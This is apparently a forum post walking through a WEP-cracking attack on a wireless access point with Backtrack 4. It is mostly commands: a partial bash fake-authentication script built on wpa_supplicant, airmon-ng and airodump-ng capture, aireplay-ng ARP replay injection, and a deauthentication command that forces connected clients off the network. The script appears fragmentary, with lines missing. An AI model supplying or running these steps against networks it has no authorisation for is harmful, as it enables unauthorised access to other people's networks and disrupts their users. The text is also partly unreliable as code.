I just wanted to post my success and what steps i followed to achieve it, because i know that many people have had problems with this (including me until about 2 hours ago).
I am using Backtrack 4 Pre Final straight "out of the box". No mods to drivers, aircrack suite, etc...
First, I created the fakeit script posted earlier in this thread. Simply copy and paste this code into your favorite text editor, and save it as fakeit.sh in the root folder
I have already taken out the \n characters for you, so there should be no problems with that.
echo "Enter the ESSID of the Target Network: (use last)"
if [ "$SEL" != "" ]
if [ -e fake.conf ]; then
echo "Deleting old fake.conf"
}' > fake.conf
echo "Starting Fake Authentication with $SEL"
if ! [ -e fake.conf ]; then
echo "ERROR - No config found, Provide ESSID"
echo "Starting Fake Authentication with Previous ESSID"
echo "How many times do you want to fake it? (30):"
if [ "$TIMES" = "" ]; then TIMES=30; fi
echo "How many seconds between restarts? (45):"
if [ "$SEC" = "" ]; then SEC=45; fi
while [ $i -le $TIMES ]
wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
i=`expr $i + 1`
if [ $i -le $TIMES ]; then
echo "Reconnecting in $SEC seconds"
echo "Faking orgasam again... uh! ah! That's the spot!"
Note the bssid, channel, and essid of the network
airmon-ng start wlan0
Stop airodump with Ctrl-C
Restart airodump on the correct channel with
Leave that running and open a new terminal. Start the fakeit script with
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
Answer what it asks for. The main thing is to include the essid of your AP. The rest you can probably just press enter for each question and use the default values.
If all goes well, you'll get a message that says
Great, now you're associated with the AP and you should be able to replay ARP packets.
Fake Auth Connection (1 of 30) Success ...maybe check airodump-ng to be sure.
Reconnecting in 45 seconds
Faking orgasam again... uh! ah! That's the spot!
Open a third terminal and start injection with
Soon after, if you capture any ARP requests, you'll be able to replay these and the #Data should increase quickly.
aireplay-ng -3 -b 'bssid' mon0
I have not been successful without having another client connected to the network. If there is a client connected and you want to force them to send an ARP request (if you're impatient like me), you can open a fourth terminal and use
This will deauthenticate them and force them to reauthenticate producing an ARP request and the the injection started more quickly.
aireplay-ng -0 1 -a 'AP bssid' mon0
Hopefully this will help someone. Please dont be too harsh, this was my first post here.
On a side note, is it possible to inject WITHOUT a client already connected to the network?
And, while it seems unimportant, because i was able to crack my WEP key, I never collect any ACK packets. It remains at 0 during this entire process. I have tried generating ACK packets on the network by connecting multiple clients to the network while im attacking. Obviously there are ACK packets on the network since the client connects and the handshake is completed. Can anyone come up with a reason for this?